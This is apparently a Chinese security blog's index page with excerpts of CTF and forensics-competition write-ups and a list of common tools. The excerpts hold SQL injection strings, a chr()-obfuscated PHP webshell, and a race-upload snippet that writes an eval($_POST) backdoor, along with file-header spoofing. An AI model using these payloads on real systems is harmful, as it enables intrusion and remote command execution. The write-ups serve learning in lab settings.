常用资源汇总
常用资源汇总由于本人脑子不好使,经常忘一些东西,故写篇文章汇总一些资源以便随时使用。 命令类GitfastbootADB 工具类Arjun sqlmap fenjing flask-session-cookie-manager fastcoll flask-unsign
山警网络犯罪侦查实训
本意是帮侦查的师姐完成一下作业,结果发现有的题目真不错,遂整理一篇题解 攻防技能专项训练SQL注入level3过滤了单引号,不能用万能密码,我们用SQL中的转义字符将admin后面的单引号转义为字符串里面的内容 1234567-- 原始查询SELECT * FROM users WHERE username='admin' AND password='123456&#
2026平航杯
服务器写在前面写这部分的时候还没发官方wp,我还想出题人咋这坏,把运行的环境都删了,结果不用装npm,原本带的nodejs就够了,启动的命令在package.json 分析服务器镜像,内核版本为? 分析服务器镜像,用户登录成功系统的次数为 分析服务器镜像,redis数据库服务密码是多少仿真服务器,在本地连接。Redis 的配置文件通常位于 /etc/redis/redis.conf 1sudo
2025獬豸杯复现
一上手感觉难度比平航杯大很多,题目与题目之间没有故事线串起来,遂写一篇复现记录一下做题思路 手机取证登录的直播 APP 的 IDX 是多少?idx是一个用户信息,大概率会在数据库里面找到 先用火眼分析应用列表 那么就是烟雨直播了,我们去搜索一下包的位置 data.tar/data_242/com.huodong.yanyu,我们在databases文件夹下面找到一堆数据库,这里应该是要用navi
PolarisCTF
only real非预期直接看/flag.php就行 revengejwt爆破密钥伪造admin之后就可以上传图片,后端对文件类型没有校验,直接抓包修改文件后缀名,文件内容有WAF,我们使用ascii🐎 12345678<?=$func=chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);$cmd='';
SDPCSEC纳新赛3.0
webreal_signin提示有备份,直接扫一下目录,果然发现了index.php.bak 12345678910111213141516171819<?php$SECRET_KEY='xxxxxxxxxxxx'; # len($SECRET_KEY) = 12function hashEncode($data) { global $SECRET_KEY
2026数字中国
公共安全赛道gopherblog1GET /api/posts/search?q=' OR 1=1 -- 返回了所有文章,存在SQL注入漏洞 1' UNION SELECT 1,name,sql,2,3',4 FROM sqlite_master WHERE type='table' -- 查表,有users,settings,posts三
ctfshow
文件上传web161-163文件头伪造1GIF89a 竞争上传123<?php$f=fopen("7.php","w");fputs($f,'<?php eval($_POST[7]);?>');?> web164上传一个正常的图片,发现查看图片的时候存在文件包含漏洞,打一个图片马 12345678910111
